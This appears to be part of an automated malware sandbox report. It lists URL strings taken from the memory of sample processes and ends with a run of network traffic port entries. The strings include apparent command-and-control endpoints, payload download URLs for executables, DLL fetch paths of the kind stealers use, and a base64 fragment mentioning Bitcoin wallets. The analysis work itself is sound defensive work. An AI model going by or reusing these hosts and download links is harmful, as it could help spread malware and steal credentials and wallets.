Source: skotes.exe, 00000019.00000002.2513354623.000000000109B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: file.exe, 00000000.00000002.1867859972.00000000015FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: skotes.exe, 00000019.00000002.2513354623.000000000109B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: skotes.exe, 00000019.00000002.2513354623.000000000109B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exeD
Source: skotes.exe, 00000019.00000002.2513354623.000000000109B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/well/random.exe
Source: skotes.exe, 00000019.00000002.2513354623.000000000109B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/well/random.exe450;
Source: skotes.exe, 00000019.00000002.2513354623.000000000109B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/well/random.exeQ
Source: skotes.exe, 00000019.00000002.2513354623.000000000109B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/well/random.exec613
Source: skotes.exe, 00000019.00000002.2513354623.000000000109B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/well/random.exeo
Source: file.exe, 00000000.00000002.1867859972.00000000015FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1852024640.0000000001044000.00000040.00000001.01000000.00000003.sdmp, 0fb4fa91ba.exe, 0000001D.00000002.2480751384.00000000015CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1867859972.000000000165A000.00000004.00000020.00020000.00000000.sdmp, 0fb4fa91ba.exe, 0000001D.00000002.2480751384.0000000001627000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.1867859972.0000000001677000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
Source: file.exe, 00000000.00000002.1867859972.0000000001677000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
Source: file.exe, 00000000.00000002.1867859972.0000000001677000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dllL
Source: file.exe, 00000000.00000002.1867859972.000000000165A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: file.exe, 00000000.00000002.1867859972.000000000165A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dllD
Source: file.exe, 00000000.00000002.1867859972.0000000001677000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
Source: file.exe, 00000000.00000002.1867859972.0000000001677000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dllf
Source: file.exe, 00000000.00000002.1867859972.00000000015FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
Source: file.exe, 00000000.00000002.1867859972.000000000165A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dllS
Source: file.exe, 00000000.00000002.1867859972.000000000165A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dllb
Source: file.exe, 00000000.00000002.1867859972.0000000001677000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
Source: file.exe, 00000000.00000002.1867859972.0000000001677000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dllb
Source: file.exe, 00000000.00000002.1867859972.000000000165A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: file.exe, 00000000.00000002.1867859972.000000000165A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/T
Source: file.exe, 00000000.00000002.1867859972.000000000165A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1898846164.0000000023834000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1852024640.0000000001044000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1898846164.0000000023828000.00000004.00000020.00020000.00000000.sdmp, 0fb4fa91ba.exe, 0000001D.00000002.2480751384.000000000163F000.00000004.00000020.00020000.00000000.sdmp, 0fb4fa91ba.exe, 0000001D.00000002.2480751384.0000000001612000.00000004.00000020.00020000.00000000.sdmp, 0fb4fa91ba.exe, 0000001D.00000002.2480751384.0000000001627000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.1898846164.0000000023834000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php&_
Source: 0fb4fa91ba.exe, 0000001D.00000002.2480751384.0000000001627000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/8
Source: file.exe, 00000000.00000002.1898846164.0000000023834000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php1e
Source: file.exe, 00000000.00000002.1898846164.0000000023834000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpBS;.VBE;.JS;.JSE;.
Source: file.exe, 00000000.00000002.1898846164.0000000023828000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpP
Source: file.exe, 00000000.00000002.1852024640.0000000001044000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpation
Source: 0fb4fa91ba.exe, 0000001D.00000002.2480751384.000000000163F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpcg
Source: file.exe, 00000000.00000002.1867859972.00000000015FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpd
Source: file.exe, 00000000.00000002.1852024640.0000000001044000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpd2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8K
Source: file.exe, 00000000.00000002.1852024640.0000000001044000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpdge
Source: 0fb4fa91ba.exe, 0000001D.00000002.2480751384.00000000015EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpn
Source: file.exe, 00000000.00000002.1898846164.0000000023828000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpx
Source: file.exe, 00000000.00000002.1898846164.0000000023834000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpy5
Source: 0fb4fa91ba.exe, 0000001D.00000002.2480751384.0000000001627000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/ws
Source: file.exe, 00000000.00000002.1852024640.0000000001044000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.2069365c8833f063ca53d79d3b404e416815d450862636a9c8fb29yZSBPbGR8MXxcQml0Y29pblx8Kn
Source: 0fb4fa91ba.exe, 0000001D.00000002.2480751384.00000000015CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206PBMpw
Source: file.exe, 00000000.00000002.1852024640.0000000001044000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206ata
Source: skotes.exe, 00000019.00000002.2513354623.000000000109B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000019.00000002.2513354623.0000000001085000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpF
Source: skotes.exe, 00000019.00000002.2513354623.0000000001085000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpb
Source: skotes.exe, 00000019.00000002.2513354623.000000000107E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000019.00000002.2513354623.000000000102B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000019.00000002.2513354623.000000000109B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/7299809293/qk4EiZw.exe
Source: skotes.exe, 00000019.00000002.2513354623.000000000107E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/7299809293/qk4EiZw.exeXYZ0123456789
Source: skotes.exe, 00000019.00000002.2513354623.000000000102B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/7299809293/qk4EiZw.exeshqos.dll)U
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 9faf801df7.exe, 0000001C.00000003.2342500104.0000000000FCA000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 0000001C.00000003.2342216529.0000000000F71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: qk4EiZw.exe, 0000001B.00000002.2518875337.0000000005351000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: chromecache_98.12.dr	String found in binary or memory: http://www.broofa.com
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.1903696304.000000007013D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.1903162127.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1896450432.000000001D7EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000003.1454505396.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, EBAKFIIJ.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_98.12.dr	String found in binary or memory: https://apis.google.com
Source: 9faf801df7.exe, 0000001C.00000003.2342216529.0000000000FDD000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 0000001C.00000002.2343522276.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 0000001C.00000003.2342540131.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 0000001C.00000002.2343911832.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 00000020.00000002.2509607075.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 00000020.00000002.2509607075.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/
Source: 9faf801df7.exe, 0000001C.00000003.2342216529.0000000000FDD000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 0000001C.00000003.2342540131.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 0000001C.00000002.2343911832.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/&
Source: 9faf801df7.exe, 0000001C.00000003.2342216529.0000000000FDD000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 0000001C.00000002.2343839357.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 0000001C.00000003.2342500104.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 0000001C.00000003.2342216529.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 0000001C.00000003.2342599097.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 0000001C.00000003.2342540131.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 00000020.00000002.2509607075.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/api
Source: 9faf801df7.exe, 00000020.00000002.2509607075.0000000000F68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/api)
Source: 9faf801df7.exe, 0000001C.00000003.2342620516.0000000000F7B000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 0000001C.00000002.2343796739.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 0000001C.00000003.2342216529.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 0000001C.00000003.2342563019.0000000000F73000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/apiA6
Source: 9faf801df7.exe, 00000020.00000002.2509607075.0000000000F68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz:443/api
Source: file.exe, 00000000.00000002.1898846164.000000002381C000.00000004.00000020.00020000.00000000.sdmp, JDHCBAEHJJJKKFIDGHJE.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: file.exe, 00000000.00000002.1898846164.000000002381C000.00000004.00000020.00020000.00000000.sdmp, JDHCBAEHJJJKKFIDGHJE.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: file.exe, 00000000.00000003.1454505396.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, EBAKFIIJ.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1454505396.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, EBAKFIIJ.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1454505396.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, EBAKFIIJ.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.1898846164.000000002381C000.00000004.00000020.00020000.00000000.sdmp, JDHCBAEHJJJKKFIDGHJE.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: file.exe, 00000000.00000002.1898846164.000000002381C000.00000004.00000020.00020000.00000000.sdmp, JDHCBAEHJJJKKFIDGHJE.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.1454505396.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, EBAKFIIJ.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1454505396.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, EBAKFIIJ.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1454505396.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, EBAKFIIJ.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chromecache_98.12.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_98.12.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_98.12.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_98.12.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: JDHCBAEHJJJKKFIDGHJE.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: chromecache_98.12.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: BKJKJEHJJDAKECBFCGIDBGCAEG.0.dr	String found in binary or memory: https://support.mozilla.org
Source: BKJKJEHJJDAKECBFCGIDBGCAEG.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: BKJKJEHJJDAKECBFCGIDBGCAEG.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
Source: file.exe, 00000000.00000002.1898846164.000000002381C000.00000004.00000020.00020000.00000000.sdmp, JDHCBAEHJJJKKFIDGHJE.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000003.1454505396.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, EBAKFIIJ.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: chromecache_98.12.dr	String found in binary or memory: https://www.google.com
Source: file.exe, 00000000.00000003.1454505396.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, EBAKFIIJ.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chromecache_98.12.dr	String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_98.12.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_98.12.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: file.exe, 00000000.00000002.1898846164.000000002381C000.00000004.00000020.00020000.00000000.sdmp, JDHCBAEHJJJKKFIDGHJE.0.dr	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: BKJKJEHJJDAKECBFCGIDBGCAEG.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.1852024640.000000000108C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: BKJKJEHJJDAKECBFCGIDBGCAEG.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: file.exe, 00000000.00000002.1852024640.000000000108C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: BKJKJEHJJDAKECBFCGIDBGCAEG.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: file.exe, 00000000.00000002.1852024640.000000000108C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.1717786604.0000000023A61000.00000004.00000020.00020000.00000000.sdmp, BKJKJEHJJDAKECBFCGIDBGCAEG.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: BKJKJEHJJDAKECBFCGIDBGCAEG.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.1852024640.000000000108C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.1717786604.0000000023A61000.00000004.00000020.00020000.00000000.sdmp, BKJKJEHJJDAKECBFCGIDBGCAEG.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
